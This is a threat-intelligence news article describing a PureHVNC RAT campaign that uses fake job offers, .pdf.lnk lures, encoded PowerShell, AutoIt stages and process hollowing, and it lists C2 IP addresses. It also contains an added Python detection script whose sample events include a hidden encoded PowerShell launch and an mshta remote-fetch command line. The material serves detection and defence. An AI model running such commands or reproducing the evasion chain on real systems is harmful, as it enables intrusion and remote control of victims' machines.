PureHVNC RAT Uses Fake Job Offers and PowerShell to Evade Security Defenses
A new and highly evasive malware campaign delivering the PureHVNC Remote Access Trojan (RAT) has been identified by Netskope Threat Labs, showcasing a complex multi-layer infection chain designed to bypass modern security defenses.
This campaign, active in 2024, leverages fake job offers from well-known global brands like Bershka, Fragrance Du Bois, John Hardy, and Dear Klairs to lure victims, targeting individuals seeking high-profile marketing roles in the beauty and fashion industries.
Sophisticated Multi-Layer Infection Chain
The use of such tailored social engineering tactics, combined with advanced technical evasion methods, underscores the sophistication of this threat; once installed, the RAT grants attackers full system access to deploy additional malware and tools.
The infection begins with the download of a malicious LNK file disguised as a legitimate document, often bearing dual extensions like “.pdf.lnk” to mislead users into believing it is a harmless PDF.

Upon execution, the LNK file triggers a PowerShell command that decodes a base64-encoded script, initiating a multi-stage process involving PowerShell, JavaScript, AutoIt scripts, and obfuscated payloads.
This chain includes downloading a large fake MP4 file laced with malicious JavaScript hidden within HTML tags, which further decodes and executes additional scripts to retrieve and run a portable executable (PE) file named “phom.exe.”
Technical Evasion Tactics
A decoy PDF resembling a job offer is simultaneously displayed to maintain the ruse, while behind the scenes, an AutoIt-compiled binary deploys further scripts, creates persistence via an internet shortcut in the Windows Startup folder, and uses process hollowing to inject a .NET payload into legitimate processes like jsc.exe or AppLaunch.exe.
This payload, encrypted with AES-256 in CBC mode and obfuscated with .NET Reactor, ultimately loads the PureHVNC RAT, with configurations revealing multiple campaign IDs and associated command-and-control (C2) servers such as 85.192.48.3 and 139.99.188.124.
The campaign employs extensive obfuscation at every stage, using tools like CypherIT crypter for AutoIt scripts and embedding junk data to evade detection.

Anti-analysis checks are also in place, terminating execution if common antivirus emulator names or processes like AvastUI.exe are detected.
Persistence is achieved through files dropped in a “WordGenius Technologies” folder in %LocalAppData%, with dynamic naming conventions to further avoid detection.
The technical intricacy of this attack, from string replacement in scripts to leveraging native Windows tools like mshta.exe for remote file execution, highlights its intent to sidestep traditional security measures.
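The chain described above maps onto a handful of host-telemetry checks. The Python below is an added example, not Netskope's code or anything taken from the campaign: it classifies constructed process-creation and network events against the indicators the write-up names (the double-extension LNK, encoded PowerShell, mshta.exe fetching remote content, jsc.exe/AppLaunch.exe spawned from an untrusted parent, the "WordGenius Technologies" folder and the two C2 addresses). The sample paths, the `loader.exe` name, the decoy encoded command and the `example.invalid` URL are assumptions.

```python
import base64
import re

# Indicators named in the write-up above; the sample events and paths below are constructed.
C2_IPS = {"85.192.48.3", "139.99.188.124"}
HOLLOWING_TARGETS = {"jsc.exe", "applaunch.exe"}
TRUSTED_PARENT_DIRS = ("c:\\windows\\", "c:\\program files")

def decode_encoded_command(cmdline):
    # PowerShell -EncodedCommand carries base64 of UTF-16LE text; None if absent or invalid.
    m = re.search(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(ev):
    # Return the rule names one process/network event matches; an empty list means unremarkable.
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    parent, cmd = ev["parent"].lower(), ev["cmdline"]
    hits = []
    if re.search(r"\.(?:pdf|docx?|xlsx?)\.lnk\b", cmd, re.I):
        hits.append("lnk_double_extension")            # ".pdf.lnk" lure file
    if image == "powershell.exe" and decode_encoded_command(cmd) is not None:
        hits.append("powershell_encoded_command")      # base64 stage-one script
    if image == "mshta.exe" and re.search(r"https?://", cmd, re.I):
        hits.append("mshta_remote_content")            # native tool pulling a remote script
    if image in HOLLOWING_TARGETS and not parent.startswith(TRUSTED_PARENT_DIRS):
        hits.append("hollowing_target_untrusted_parent")  # jsc.exe/AppLaunch.exe from odd parent
    if "wordgenius technologies" in parent or "wordgenius technologies" in cmd.lower():
        hits.append("wordgenius_staging_folder")       # %LocalAppData% drop folder
    if ev.get("dest_ip") in C2_IPS:
        hits.append("known_c2_address")
    return hits

STAGE_DIR = r"C:\Users\u\AppData\Local\WordGenius Technologies"  # constructed path
ENCODED = base64.b64encode("Write-Output 'decoy'".encode("utf-16-le")).decode()  # harmless stand-in
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c start "" "C:\Users\u\Downloads\Job_Offer.pdf.lnk"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc " + ENCODED},
    {"parent": STAGE_DIR + r"\loader.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/stage.hta"},
    {"parent": STAGE_DIR + r"\loader.exe", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe",
     "cmdline": "jsc.exe", "dest_ip": "85.192.48.3"},
]
```

Running `classify` over each of `SAMPLE_EVENTS` flags every stage, while a jsc.exe launched from under Program Files by a build tool produces no hits, which is the distinction the parent-path check is for.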
Netskope Threat Labs notes that while the exact initial vector remains unclear, email delivery is strongly suspected based on malware configurations and lures like copyright infringement notices alongside job offers.
PureHVNC continues to evolve with new delivery methods, including Python-based chains and genAI site lures observed in 2024. Ongoing vigilance and advanced threat detection are therefore critical to counter its tactics, which pose a significant risk to individuals and organizations alike by enabling unauthorized access and potential further exploitation.